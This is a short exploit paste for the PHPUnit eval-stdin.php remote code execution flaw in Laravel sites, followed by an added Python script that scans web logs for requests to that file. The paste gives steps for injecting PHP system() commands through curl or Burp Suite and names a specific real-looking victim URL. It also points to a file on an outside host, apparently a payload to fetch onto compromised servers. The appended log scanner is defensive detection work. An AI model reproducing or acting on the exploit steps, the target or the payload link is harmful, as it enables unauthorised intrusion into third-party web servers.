ToKeiChun

Laravel PHPUnit RCE

Sep 21st, 2019
laravel phpunit rce

PROLOG :
[-] The bug is in vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[-] Use curl or Burp Suite to execute the vulnerable file.

POC :
[-] Access the vulnerable file on the target site.
example : http://click.ecc.ac.jp/ecc/fashion_club/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[-] Use curl, or reload the page while intercepting with Burp Suite; then you can inject PHP code there, like <?php system(' -ls la'); etc.
[-] If the site is vulnerable, the target reacts to the PHP code that you run.

EPILOG :
[-] When you can't upload a file there, you can search for a directory with readable permission.
[-] Or if you can't use wget, curl, etc., you can use this.
https://khunerable.net/images/3x.txt
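
A defender's check for the request described above, as an added example that is not part of the original paste: it scans web-server access logs (combined log format assumed) for requests to eval-stdin.php, including percent-encoded and double-slash variants, and reports whether the server actually served the file. The function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Path named in the paste; compared in lower case after URL-decoding.
TARGET = "/vendor/phpunit/phpunit/src/util/php/eval-stdin.php"

# Common/combined log format: ip - user [time] "METHOD path PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalize(path):
    """Decode percent-escapes (twice, for double encoding), drop the query, collapse slashes."""
    path = unquote(unquote(path)).split("?", 1)[0].replace("\\", "/")
    return re.sub(r"/+", "/", path).lower()

def scan(lines):
    """Return one (ip, method, status, verdict) tuple per request for eval-stdin.php."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m or not normalize(m["path"]).endswith(TARGET):
            continue
        status = int(m["status"])
        # A 2xx answer means the web server served the file out of vendor/.
        verdict = "EXPOSED" if 200 <= status < 300 else "blocked-or-absent"
        findings.append((m["ip"], m["method"], status, verdict))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '203.0.113.7 - - [21/Sep/2019:10:01:02 +0000] "POST /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 41 "-" "curl/7.58.0"',
    '198.51.100.9 - - [21/Sep/2019:10:02:10 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 162 "-" "-"',
    '198.51.100.9 - - [21/Sep/2019:10:02:11 +0000] "POST //vendor/phpunit/phpunit/src/Util/PHP/eval%2Dstdin.php?x=1 HTTP/1.1" 403 0 "-" "-"',
    '192.0.2.1 - - [21/Sep/2019:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, method, status, verdict in scan(SAMPLE):
        print(f"{verdict:18} {ip:15} {method:5} {status}")
```

A 2xx result means the vendor/ directory is reachable from the web root, so the host's logs and files should be reviewed.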